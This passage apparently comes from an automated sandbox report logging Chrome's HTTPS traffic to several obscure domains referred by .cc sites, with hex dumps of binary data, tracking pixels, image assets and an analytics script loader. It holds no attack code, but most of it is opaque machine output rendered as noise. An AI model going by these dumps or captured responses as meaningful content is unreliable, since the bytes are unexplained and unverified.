                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 20 02 41 c0 04 6a 21 03 20 02 41 9d 05 6a 21 05 0b 20 06 41 24 46 41 01 23 01 1b 04 40 20 03 20 04 20 05 41 00 20 0c 41 01 10 1d 41 24 23 01 41 01 46 0d 0a 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 04 22 04 36 02 f0 06 20 02 28 02 c8 04 21 07 20 02 28 02 c4 04 21 08 0b 03 40 23 01 45 04 40 20 02 20 04 36 02 f4 06 20 02 20 09 36 02 f8 06 20 0b 41 00 4c 21 03 0b 02 40 02 40 02 40 23 01 45 04 40 20 03 0d 01 20 09 2c 00 00 22 0c 41 00 4e 04 40 20 0c 41 ff 01 71 21 03 41 01 21 0c 0c 03 0b 20 02 41 90 04 6a 21 03 0b 20 06 41 25 46 41 01 23 01 1b 04 40 20 03 20 09 20 0b 10 11 41 25 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 90 04 21 03 20 02 28 02 94 04 22 0c 41 01 47 22 05 0d 02 20 03 41 fd ff 03 47 22 05 0d 02 20 02 41 f0 01 6a 21 03 0b 20 06 41 26
                                                                                                                                                          Data Ascii: Aj! Aj! A$FA#@ A AA$#AF#E@ ("6 (! (!@#E@ 6 6 AL!@@@#E@ ,"AN@ Aq!A! Aj! A%FA#@ A%#AF#E@ (! ("AG" AG" Aj! A&
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 0b 23 01 45 04 40 20 02 20 02 28 02 80 03 22 04 36 02 90 07 20 02 28 02 88 03 21 07 20 02 28 02 84 03 21 08 0c 08 0b 0b 20 03 20 02 41 90 03 6a 23 01 1b 21 03 20 06 41 31 46 41 01 23 01 1b 04 40 20 03 20 04 41 a0 8d 04 20 08 20 07 41 02 10 1d 41 31 23 01 41 01 46 0d 13 1a 0b 23 01 45 04 40 20 02 20 02 28 02 90 03 22 04 36 02 94 07 20 02 28 02 98 03 21 07 20 02 28 02 94 03 21 08 0c 07 0b 0b 20 03 20 02 41 a0 03 6a 23 01 1b 21 03 20 06 41 32 46 41 01 23 01 1b 04 40 20 03 20 04 41 a2 8d 04 20 08 20 07 41 02 10 1d 41 32 23 01 41 01 46 0d 12 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a0 03 22 04 36 02 98 07 20 02 28 02 a8 03 21 07 20 02 28 02 a4 03 21 08 0c 06 0b 0b 20 03 20 02 41 b0 03 6a 23 01 1b 21 03 20 06 41 33 46 41 01 23 01 1b 04 40 20 03 20 04 41 a4 8d 04
                                                                                                                                                          Data Ascii: #E@ ("6 (! (! Aj#! A1FA#@ A AA1#AF#E@ ("6 (! (! Aj#! A2FA#@ A AA2#AF#E@ ("6 (! (! Aj#! A3FA#@ A
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 07 20 03 41 00 48 22 0d 0d 02 20 05 41 1f 20 03 20 03 41 1f 4f 1b 75 41 0f 71 22 0d 41 0f 46 0d 0b 20 02 20 0d 41 96 83 04 6a 2d 00 00 3a 00 a7 05 20 02 41 c0 02 6a 21 0d 20 02 41 a7 05 6a 21 10 0b 20 06 41 3d 46 41 01 23 01 1b 04 40 20 0d 20 04 20 10 20 08 20 07 41 01 10 1d 41 3d 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 02 22 04 36 02 c0 07 20 03 41 04 6b 21 03 20 02 28 02 c8 02 21 07 20 02 28 02 c4 02 21 08 0c 01 0b 0b 0b 23 01 45 04 40 20 02 20 04 36 02 d0 07 0b 0b 23 01 45 04 40 20 02 20 04 36 02 84 07 20 02 20 04 36 02 88 07 20 0b 20 0c 49 22 03 0d 02 20 0b 20 0c 6b 21 0b 20 09 20 0c 6a 21 09 0c 01 0b 0b 0b 20 06 41 3e 46 41 01 23 01 1b 04 40 10 1e 41 3e 23 01 41 01 46 0d 09 1a 0b 23 01 45 04 40 00 0b 0b 20 01 20 02 41 c0 01 6a
                                                                                                                                                          Data Ascii: AH" A AOuAq"AF Aj-: Aj! Aj! A=FA#@ AA=#AF#E@ ("6 Ak! (! (!#E@ 6#E@ 6 6 I" k! j! A>FA#@A>#AF#E@ Aj


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          294192.168.2.550050170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC610OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=2be590e8254784ac7a9b1aea7fbf1d39e59f72f540d607c53c119fc370cb49df; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 9
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:08 UTC1098INData Raw: 34 34 33 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: 443{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          295192.168.2.55005190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC626OUTGET /fiximg/ac-20200404/fileupload/uy09/202307/202307200237350.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC553INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 2220
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE7[3],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467551
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: be350b91108f8f3d1c5e4479274fc960
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124449
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:07 UTC2220INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 36 6e 4c 35 37 4d 61 7a 43 44 52 51 49 50 62 47 4f 32 68 41 64 59 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164Nm+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkb6nL57MazCDRQIPbGO2hAdYGuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          296192.168.2.55005790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC552OUTGET /cc.png?r=3717168674 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[447],EU-GER-frankfurt-EDGE5-CACHE1[283,TCP_MISS,446],EU-FRA-paris-GLOBAL1-CACHE27[274],EU-FRA-paris-GLOBAL1-CACHE2[269,TCP_MISS,274],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 268
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c5cf514d29340c3e2f083b5ff5678f2f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          297192.168.2.550058223.121.15.244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC551OUTGET /cc.png?r=6167440772 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC607INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE2-CACHE3[688],EU-GER-frankfurt-EDGE2-CACHE6[506,TCP_MISS,686],EU-FRA-paris-GLOBAL1-CACHE20[496],EU-FRA-paris-GLOBAL1-CACHE26[295,TCP_MISS,494],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 280
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4ad66bc31f035f2f05f61a281664034a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          298192.168.2.55006090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC549OUTGET /cc.png?r=8285707295 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[298],EU-GER-frankfurt-EDGE5-CACHE6[295,TCP_MISS,297],EU-FRA-paris-GLOBAL1-CACHE21[285],EU-FRA-paris-GLOBAL1-CACHE6[281,TCP_MISS,284],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 277
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5ee8b96377b919dfc7957a08b290cdf1
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          299192.168.2.550049103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC614OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:08 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          2024-06-09 22:41:08 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 35 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 5
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:08 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          300192.168.2.55006290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC614OUTGET /pc/image-pc/index/312/service/icon_kuaijie.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 12833
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:57 GMT
                                                                                                                                                          ETag: "5d71fe89-3221"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465112
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 70923139c18e0c44a051fd22b00494c0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126888
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC12833INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 4e 08 06 00 00 00 b7 cd 91 46 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 31 38 49 44 41 54 78 da d5 bc 79 bc 57 55 bd ff ff 5c 6b ed bd 3f e3 19 99 04 d4 32 cd cc bc d9 ed 96 a5 75 bd a5 39 9b 23 8a 38 4f c8 20 60 8a 62 08 ca 28 02 4e 80 20 20 82 22 2a 2a ce 24 6a 66 dd ea 5a 76 cd 06 cb ba 96 43 2a 28 c3 19 3f e3 fe ec bd 86 df 1f fb 73 0e 07 24 b3 ec fe be df ef 7a 3c f6 e3 9c b3 cf 1e d6 7e af f7 7a ad f7 fb f5 7e bf 97 e0 43 9a 04 44 fd 77 c3 f6 3f a4 03 0f 70 40 2c ea e7 ad 04 6c 72 81 02
                                                                                                                                                          Data Ascii: PNGIHDRPNFgAMAa cHRMz&u0`:pQ<bKGD18IDATxyWU\k?2u9#8O `b(N "**$jfZvC*(?s$z<~z~CDw?p@,lr


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          301192.168.2.55006390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC645OUTGET /pc/image-pc/index/367/mask_sport.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
